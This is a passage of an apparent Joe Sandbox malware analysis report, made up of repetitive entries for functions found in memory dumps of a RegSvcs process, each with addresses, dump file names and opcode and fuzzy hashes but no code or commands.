                                                            • Instruction ID: 40bb973a6db5b7acd9a28e5e83ab93e0a3209597b0b58df94b7f6334c1a2907b
                                                            • Opcode Fuzzy Hash: 91d45ec6e253d194a2f7a328d306f69d31ef339f10a95b7ea54f42b7acc0426e
                                                            • Instruction Fuzzy Hash: 4721B335B202098FEB15DB69C854BAD7BF6AF88710F118225E601EB3E1DA718D418790
                                                            Function 01209F81 Relevance: .1, Instructions: 73COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9b55eb90a415ebd92e3c398703b02e78d8353c127de05decc30e9cd59964d513
                                                            • Instruction ID: 711859a221895ecb380761746aac59d77d56159aee3907b4480186ef80bf8d64
                                                            • Opcode Fuzzy Hash: 9b55eb90a415ebd92e3c398703b02e78d8353c127de05decc30e9cd59964d513
                                                            • Instruction Fuzzy Hash: BB21B830E1031ADBDB1ACF68C4446DEB7B2BF85300F508659E916F7381DB719845CB50
                                                            Function 011BD3BC Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3d68a62c5a62bc598164f63cae32ce60aa77a0efdcaaa6de27d3fe67863f8c96
                                                            • Instruction ID: 9af864d2129cf85f93ef35c6db8fe43e8c73618880eb482c19313e36f9ba66b0
                                                            • Opcode Fuzzy Hash: 3d68a62c5a62bc598164f63cae32ce60aa77a0efdcaaa6de27d3fe67863f8c96
                                                            • Instruction Fuzzy Hash: 892134B5604204EFDF0DDF54E5C0BA6BB61FB84318F20C56DE90A0B692C77AE446CA62
                                                            Function 011BD20C Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: eb600c4c30cecedd5cf1829b390b4b392421d795be783d9b6bd41c739f6f0b33
                                                            • Instruction ID: 41f8ef74dab43c29cd3ed9a1ae392bd9ea30e93a2f75b9a0483be2e540a2cefe
                                                            • Opcode Fuzzy Hash: eb600c4c30cecedd5cf1829b390b4b392421d795be783d9b6bd41c739f6f0b33
                                                            • Instruction Fuzzy Hash: 4A210476504284EFDF0DDF54E5C0B6ABB65FB84338F20C5A9E9094B242C37AD406CA62
                                                            Function 011BD044 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 5df19a67eba3083c73bcc96cd5c78180ad751f4608090e67c47ac9b60ac26e31
                                                            • Instruction ID: ca87e743ff06c040b11be122eb6d8587c50471417f0f6e0f36c4d402a5267c53
                                                            • Opcode Fuzzy Hash: 5df19a67eba3083c73bcc96cd5c78180ad751f4608090e67c47ac9b60ac26e31
                                                            • Instruction Fuzzy Hash: FE212271504204EFDF1DDF64E9C0B66BB61FB84318F20C5ADE9090B252C77AD446CA62
                                                            Function 0120A856 Relevance: .1, Instructions: 72COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3a6e0c64cb2bc4acc445af4a722b11f5c14c653d30a0f97db10c55e5a570721e
                                                            • Instruction ID: d4142bbf78ca3c3f4e8225716d57da7796307adb68944d896157eec35277f74b
                                                            • Opcode Fuzzy Hash: 3a6e0c64cb2bc4acc445af4a722b11f5c14c653d30a0f97db10c55e5a570721e
                                                            • Instruction Fuzzy Hash: 9521CF75B202098FEB05CBA8C955BAD7BF6BF8C714F118125E105EB3A1DA71CD40CB90
                                                            Function 012A1E5C Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25b9538024d9017c8c1756e7a18045d19c1a675b02337ba72cf59f3facaf6eae
                                                            • Instruction ID: b89ba4732ed96e94ca5cad3031e742ebfc0540720363d3000cf59554fb15ba6b
                                                            • Opcode Fuzzy Hash: 25b9538024d9017c8c1756e7a18045d19c1a675b02337ba72cf59f3facaf6eae
                                                            • Instruction Fuzzy Hash: 0031F1B0C11208DFDB24CF9AD589B9EBFF4BF48710F648019E905BB251D7B5A845CBA4
                                                            Function 0120186A Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 6c338d4d8e5933fc2b90f8944c590332bb36a9f42421ee206d5be8689ea46513
                                                            • Instruction ID: 62dd589e7a51163beab50cb301af26d447468384832759c95f67566ff4e071f7
                                                            • Opcode Fuzzy Hash: 6c338d4d8e5933fc2b90f8944c590332bb36a9f42421ee206d5be8689ea46513
                                                            • Instruction Fuzzy Hash: 83216930B1024ACFEB26EFA8C5556AE7BF2AF49341F100568D606EB391EB31CD11CB91
                                                            Function 01204F78 Relevance: .1, Instructions: 71COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: c6a2314e9c8465b8b08c62c9500ee25c3cb26b19ce0718d1d837cde09496f409
                                                            • Instruction ID: b37097fa16173bcb855acd970d315e8f40578b9d7da91603dcc53d741cb44e71
                                                            • Opcode Fuzzy Hash: c6a2314e9c8465b8b08c62c9500ee25c3cb26b19ce0718d1d837cde09496f409
                                                            • Instruction Fuzzy Hash: 06212434A10205CFDB19EF68C458AAE7BF2AF4D740F104568E506EB3A1DB329D41CB51
                                                            Function 012A24C4 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7467a006c5b0c11164e0fbac6d27e5ceef8a293dba8f0fbee231deb7c4d2021e
                                                            • Instruction ID: 04ffa12858efde5e2daf473b415a879c624cfbc666ed7caa728c78b0126cbed5
                                                            • Opcode Fuzzy Hash: 7467a006c5b0c11164e0fbac6d27e5ceef8a293dba8f0fbee231deb7c4d2021e
                                                            • Instruction Fuzzy Hash: FF3111B0C11208DFDB24CF99D598B9EBFF4BF48710F64801AE445AB250C7B59845CBA0
                                                            Function 01201878 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ec23ad95e42910e18eada89ec0c271ab006d4e9f393dd0c10778aa61f8bb569d
                                                            • Instruction ID: 548e106447fdb53fd14eff5e2f2ccc9f40775f0aa1c86e124e466954b65f0739
                                                            • Opcode Fuzzy Hash: ec23ad95e42910e18eada89ec0c271ab006d4e9f393dd0c10778aa61f8bb569d
                                                            • Instruction Fuzzy Hash: 91216D30B1020ACFDB66EBB8C5656AE7BF2AF49300F100568D606EB391DB31CD11CB91
                                                            Function 01209F90 Relevance: .1, Instructions: 70COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7da98bdd932c1f5603112de5906fb3a71760d214694c90e4649930763f7a51c8
                                                            • Instruction ID: 63ca638edcd62c7a0a938b6106688bbee9c817a8deb00e2734f4081858fb70e6
                                                            • Opcode Fuzzy Hash: 7da98bdd932c1f5603112de5906fb3a71760d214694c90e4649930763f7a51c8
                                                            • Instruction Fuzzy Hash: 64219530E1031A9BCB1ACFA9C454ADEB7B6BF89300F50865AE916F7381DB71A845CB50
                                                            Function 0120147A Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7f2d0df0043b8c1d8af566f7b1d0ff5daf59e504f40129961a69e8bd2b264d99
                                                            • Instruction ID: 8a242e0d77e12c7f9a995ab6591d3c0258e4171fa38010eaf1142627cef22358
                                                            • Opcode Fuzzy Hash: 7f2d0df0043b8c1d8af566f7b1d0ff5daf59e504f40129961a69e8bd2b264d99
                                                            • Instruction Fuzzy Hash: FD11B131A202168FDF23AFB894543BD7BB4EB55315F25067AD505D72D3DA32C851CB90
                                                            Function 012016A0 Relevance: .1, Instructions: 69COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2bc1e5eb9bddf3db953c7e04e57fa5682b68016ad77d45f57979dff7490fd9c1
                                                            • Instruction ID: 43b78eefbc5369b9fb8227fe74bab68005bad82531ea5025eb6b15a4862ad0b1
                                                            • Opcode Fuzzy Hash: 2bc1e5eb9bddf3db953c7e04e57fa5682b68016ad77d45f57979dff7490fd9c1
                                                            • Instruction Fuzzy Hash: C2219339A201028BEF27E72CE984B193765EB85314F105B29E206C73A7DB78DC948B91
                                                            Function 01204F88 Relevance: .1, Instructions: 68COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 33859b5ebd9602cadb1bab3084a1a7b8dabc72c45d4fd0153561a9d4688e8753
                                                            • Instruction ID: d04f2fc1010eb8fbcd429267eb3cf47e8033656fe7bdd15e9cceef62004a7659
                                                            • Opcode Fuzzy Hash: 33859b5ebd9602cadb1bab3084a1a7b8dabc72c45d4fd0153561a9d4688e8753
                                                            • Instruction Fuzzy Hash: 46213634B10205CFCB19EB78C558AAD7BF2AF4D340F104568E606EB3A5DB319D01CBA1
                                                            Function 012017B2 Relevance: .1, Instructions: 59COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: af7a3323484dc741eecc50851a4d3e6fc17f172adc6bef67d9cfb2aadfd79793
                                                            • Instruction ID: 977aee9f3af869bf1c6c0b6b3cd90d6afa1ac3dd0262367e07b152f32aa6d0b6
                                                            • Opcode Fuzzy Hash: af7a3323484dc741eecc50851a4d3e6fc17f172adc6bef67d9cfb2aadfd79793
                                                            • Instruction Fuzzy Hash: 3711E176F102529FEB11AB78980976E7BF9FB89350F104B29EA06D3381EB30C9118791
                                                            Function 012A1988 Relevance: .1, Instructions: 56COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: cf632f1604e68d7eb3547f681fdaac99b0f167c9f05b5fcb0433200759ea9beb
                                                            • Instruction ID: 216ca3f287f557b46fdb0e3ee91d0a70f269073c860a3f5894ff2358bde60e05
                                                            • Opcode Fuzzy Hash: cf632f1604e68d7eb3547f681fdaac99b0f167c9f05b5fcb0433200759ea9beb
                                                            • Instruction Fuzzy Hash: E91170315083899FCB028F64D85489A7FB5FF46314B0985EAE594CF273D732982ADB51
                                                            Function 012A16F1 Relevance: .1, Instructions: 55COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: b3af1f9f89f7d40eb6c04e59380dd6e2ba29c25490684eef486945bb40cc2b61
                                                            • Instruction ID: a0afa4ad49ced861ccb583112174a422b08130cdb4e389424a2ad03b21f654aa
                                                            • Opcode Fuzzy Hash: b3af1f9f89f7d40eb6c04e59380dd6e2ba29c25490684eef486945bb40cc2b61
                                                            • Instruction Fuzzy Hash: FA1106746243108FC3289B289C84632BFB5FF89714F44485ED083C7651D7B5E812CB80
                                                            Function 01206B99 Relevance: .1, Instructions: 54COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 36541f3d3ab08d8c18ae9de982366890a451a4ed6c4e52e331b6b9ed0fcde3a7
                                                            • Instruction ID: 7eaef0f899e1761970c35e53baa2e531fc47052cccc4418b92d0bfac240748cf
                                                            • Opcode Fuzzy Hash: 36541f3d3ab08d8c18ae9de982366890a451a4ed6c4e52e331b6b9ed0fcde3a7
                                                            • Instruction Fuzzy Hash: 59112E317052549FC716AB78C8203AF7BB2EF8A700F1049AAD146CB380EF369C5187A2
                                                            Function 011BD03F Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: 47b46a5e2cafbee46c1ce35900a7fab5b855ebe0627689af4ffc3a13669e19a2
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: 9411DD75504284CFCB1ACF64D9C4B55BFA2FB84318F24C6A9D8494B256C33AD44ACF62
                                                            Function 011BD3B7 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction ID: 13982f9990fdb291c15bad5d631d170d9e5160c2463fc03c136418172a809553
                                                            • Opcode Fuzzy Hash: 703b7abd3718bd21aa6f36dac6c8dc0e73c65716f16ca45b46755fc1987422b6
                                                            • Instruction Fuzzy Hash: 3F11D075504280CFCB0ACF54E5C4B55BF61FB44318F24C6A9D8494B656C33AE40ACF51
                                                            Function 011BD207 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605659989.00000000011BD000.00000040.00000800.00020000.00000000.sdmp, Offset: 011BD000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_11bd000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                            • Instruction ID: 2d1d6dc795e026f89ff907f499e98d5b19d1604b3a5532345a84a042d1ed3e09
                                                            • Opcode Fuzzy Hash: ecf76333c4857edb0cae155a2ed822a1bfe38db2c40391184a4fb299c42cee64
                                                            • Instruction Fuzzy Hash: 5311E276504284CFDB0ACF54D5C4B55FF61FB84328F24C6A9DC494B656C33AD406CB52
                                                            Function 01201488 Relevance: .1, Instructions: 53COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: a8d998e162a2a044b997e161538389ce95769ae97538dfe167d49e76c8a90827
                                                            • Instruction ID: afe6a2be0b106bacdb69268e4ec701d47bd88d7abb3ed13379a97bb5164741ff
                                                            • Opcode Fuzzy Hash: a8d998e162a2a044b997e161538389ce95769ae97538dfe167d49e76c8a90827
                                                            • Instruction Fuzzy Hash: 49018431E102168FDF22EFB884442AE7BF5EF58351F250579D505E7382EA31D841CB95
                                                            Function 012A1CA0 Relevance: .0, Instructions: 48COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 2d8184f7757e820c79c021397bb4d790828a6d10cf484c170ca6e93ea5628a83
                                                            • Instruction ID: 362dbfe4dcc0fb0e33246bc9a6ccda734c2339b9282849f3a47f75f1ea608a26
                                                            • Opcode Fuzzy Hash: 2d8184f7757e820c79c021397bb4d790828a6d10cf484c170ca6e93ea5628a83
                                                            • Instruction Fuzzy Hash: 8B1122B58046498FCB20DFAAD584BDEFFF4EF48320F24845AD659A7210D374A944CFA5
                                                            Function 012A0B74 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 25877a1f7c7835c82807b46b18a84a6144c6acda80c5ca98a9aa52cd47a91da4
                                                            • Instruction ID: df70697b7650b78a1ddf31d1786338c56650b2afa01ad211a2b16a9233b776c3
                                                            • Opcode Fuzzy Hash: 25877a1f7c7835c82807b46b18a84a6144c6acda80c5ca98a9aa52cd47a91da4
                                                            • Instruction Fuzzy Hash: 28018038224700CBD32C9B299D84636BFE9FF85760F94991DE41782600CBB0E811CB40
                                                            Function 0120A6C0 Relevance: .0, Instructions: 47COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9ab328fa9df23ed2f0192083680de62e14fa1ce1e386ac63b828cb52cdb2e8b0
                                                            • Instruction ID: acc4ddcadc13e13607ad651231816ab34a8a764f81790b744b067087157915b4
                                                            • Opcode Fuzzy Hash: 9ab328fa9df23ed2f0192083680de62e14fa1ce1e386ac63b828cb52cdb2e8b0
                                                            • Instruction Fuzzy Hash: F601F935A102058BDB09DF68D94079EBF71FFC4310F94C269C9496F296EBB0AD05C790
                                                            Function 012A1921 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 9d63b667badaa3e60ca022682045e180d05d14eefe9fce8afd3d5f36cbca7adf
                                                            • Instruction ID: ff55e85984708e83cd1ccf228acdf490332828f3bb99d1677fde0f2ec8d6d05d
                                                            • Opcode Fuzzy Hash: 9d63b667badaa3e60ca022682045e180d05d14eefe9fce8afd3d5f36cbca7adf
                                                            • Instruction Fuzzy Hash: F7018F3090D3C19FCB239B7898104A5BFB4AF4B21070849EBE1C0CB263D3359A29C7A1
                                                            Function 012A1CA8 Relevance: .0, Instructions: 44COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: fc01af061339cab4e77843301ba1099a6df003d93d8fe7f9b24dddccfe2cf61d
                                                            • Instruction ID: f0e7becabddfe0c9d8cd14ede6f3b55ba427b0331f9b00aa7573b6ee83650761
                                                            • Opcode Fuzzy Hash: fc01af061339cab4e77843301ba1099a6df003d93d8fe7f9b24dddccfe2cf61d
                                                            • Instruction Fuzzy Hash: E31100B58006498FDB20DF9AD584B9EFBF8EB48320F20841AD619A7200D378A944CFA5
                                                            Function 01207EA8 Relevance: .0, Instructions: 38COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: d20c0a58712bee748ed37b5275c009d1d7b7bb3557ed4e550b6754ac7a2c7808
                                                            • Instruction ID: 6be86817190e0d480d77ba5cd298d14164fca518e7187590b48bb27441594187
                                                            • Opcode Fuzzy Hash: d20c0a58712bee748ed37b5275c009d1d7b7bb3557ed4e550b6754ac7a2c7808
                                                            • Instruction Fuzzy Hash: 8F014B35B40204CFDB15DB74D498B6C37B2FF8A315F1009A8E5068B3A1CB30AD42CB41
                                                            Function 01201514 Relevance: .0, Instructions: 36COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 3f931480098519cb5f389cb7f709d2198ea6a4198d0e0af23636d325b3a28fbc
                                                            • Instruction ID: f07cc91f2cf41c6b80953290fa4ebbe8baedd38514a0d8f61cb0c900b50c480e
                                                            • Opcode Fuzzy Hash: 3f931480098519cb5f389cb7f709d2198ea6a4198d0e0af23636d325b3a28fbc
                                                            • Instruction Fuzzy Hash: 3EF02B73A14111CFEB238BE8A4512BC7FB0EE65321B1902DBD602DB393D665D412D751
                                                            Function 01208F20 Relevance: .0, Instructions: 34COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 449238a4ae3fd310b506ce4aedb1be391b41151f0e6afed075ffdcdc3d3375e1
                                                            • Instruction ID: d39a0f4487835c9f3ff73fe0dc17e7c7e9918e89d68e5dd1ad8d303b551e6ddc
                                                            • Opcode Fuzzy Hash: 449238a4ae3fd310b506ce4aedb1be391b41151f0e6afed075ffdcdc3d3375e1
                                                            • Instruction Fuzzy Hash: AF01A2315152C6DBEB06FB78F94069D7F71EF81300F444AADC5115B296DE352E09C782
                                                            Function 01208F30 Relevance: .0, Instructions: 33COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4605934397.0000000001200000.00000040.00000800.00020000.00000000.sdmp, Offset: 01200000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_1200000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: e383bc633ef16f7a76d82496592d107f6176cd5a6ce00f2872fc873be89de0a5
                                                            • Instruction ID: 2ab70ad704f1d5af7397458fb8ab52bcb89eae3acc5d7c6643f549296513e637
                                                            • Opcode Fuzzy Hash: e383bc633ef16f7a76d82496592d107f6176cd5a6ce00f2872fc873be89de0a5
                                                            • Instruction Fuzzy Hash: DCF04F3591124ADFDB45FBB8FA8169DBBB1EF80300F50966CC504A7254EF712E188B81
                                                            Function 012A2BB8 Relevance: .0, Instructions: 31COMMON
                                                            Download Yara Rule
                                                            Memory Dump Source
                                                            • Source File: 0000000F.00000002.4606152170.00000000012A0000.00000040.00000800.00020000.00000000.sdmp, Offset: 012A0000, based on PE: false
                                                            Joe Sandbox IDA Plugin
                                                            • Snapshot File: hcaresult_15_2_12a0000_RegSvcs.jbxd
                                                            Similarity
                                                            • API ID:
                                                            • String ID:
                                                            • API String ID:
                                                            • Opcode ID: 7a94d9393fa37c214263f6bf51137505aa3daa8a3754a3d0ce7b3e4338763316
                                                            • Instruction ID: 963d6eb89973ed37f427e3b24f567b74e35adff258736b99d646d745c700b1e6
